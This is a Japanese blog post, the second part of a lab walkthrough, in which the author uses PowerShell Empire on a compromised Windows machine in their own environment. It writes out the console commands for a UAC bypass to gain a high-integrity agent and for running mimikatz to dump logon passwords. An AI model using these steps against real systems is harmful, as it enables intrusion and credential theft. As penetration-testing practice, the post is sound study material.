とある親父の侵入実験【Empire:帝国の力 後編】

f:id:appleseedj073:20170503114540p:plain

ここで取り上げる検証等を実施する際は、全て自分の管理している環境で検証してください。使い方、実施場所を誤ると法に触れて罰せられます。

 

とりあえず続きします。

前回までに、Empireで作成したbatファイルをWindowsに渡して起動。見事にリバース接続が成功した状態で終わりました。

f:id:appleseedj073:20170503122017p:plain

こんな感じで、相手の情報がほぼほぼ丸見え。usernameからhostname、OSもわかってたw

次は、この端末のパスワードを奪取しようと思います。Windowsのパスワードを取ると行ったらmimikatz。このツールが有名であって尚且つ、このEmpireとの相性がいい(俺の勝手な想像w)というわけでパスワードの奪取までやってみよう!

 

5 パスワード奪取

上図の状態でmimikazを実行するモジュールを選択する。

 (Empire: TPESSRK3BLUPTA4G) > usemodule credentials/mimikatz/logonpasswords
 (Empire: credentials/mimikatz/logonpasswords) > info

f:id:appleseedj073:20170503194022p:plain

mimikazのlogonpasswordを割り出すモジュールを呼び出したところ。今回は、特に設定を変えることなくこのまま実行

 

f:id:appleseedj073:20170503194225p:plain

見事にエラー!!

このモジュールを動かすには、高い権限がいるっぽい(適当な意訳)

ってことでUACをbypassしてみる。

  (Empire: credentials/mimikatz/logonpasswords) > usemodule privesc/bypassuac

f:id:appleseedj073:20170503194808p:plain

ここではリスナーの指定が必須項目なのでリスナーを指定して実行。

 

 (Empire: privesc/bypassuac) > set Listener test
 (Empire: privesc/bypassuac) > execute
 [>] Module is not opsec safe, run? [y/N] y

f:id:appleseedj073:20170503195422p:plain

実行するとJobが始まって・・・

 

f:id:appleseedj073:20170503195504p:plain

新エージェントが追加される。

 

このエージェントを確認すると

f:id:appleseedj073:20170503195546p:plain

2段目に新しく追加されているのが確認できる。そして、Usernameを見てみると新しく追加された方には「*」が付加されているのが確認できる。そこで、今度は新しいエージェントにインタラクトしてみる。

 

 (Empire: agents) > interact EBGZFMZ4EVCTBBSA

f:id:appleseedj073:20170503195933p:plain

同じ端末であることは確認できるのだが一番下の項目「high_integrity」をみると0から1に変更されている。この状態で先ほど失敗したmimikazのモジュールを実行してみる。

 (Empire: EBGZFMZ4EVCTBBSA) > usemodule credentials/mimikatz/logonpasswords
 (Empire: credentials/mimikatz/logonpasswords) > execute

 

f:id:appleseedj073:20170503200329p:plain

しばらくするとJobが始まって・・・

 

f:id:appleseedj073:20170503202135p:plain

見事に取れましたw

Username : Victim

Password : password

 

6 結論

このEmpireはMetasploitに取って代わるツールではないけど、個人を狙った標的型攻撃では、とても便利なツールが用意されていて「標的型攻撃演習」というシナリオではとても便利そう。でも、使い方を間違えるととても危険なツールであることには間違いないと思った。今後もこのEmpireを使った攻撃シナリオについて検証してみたい。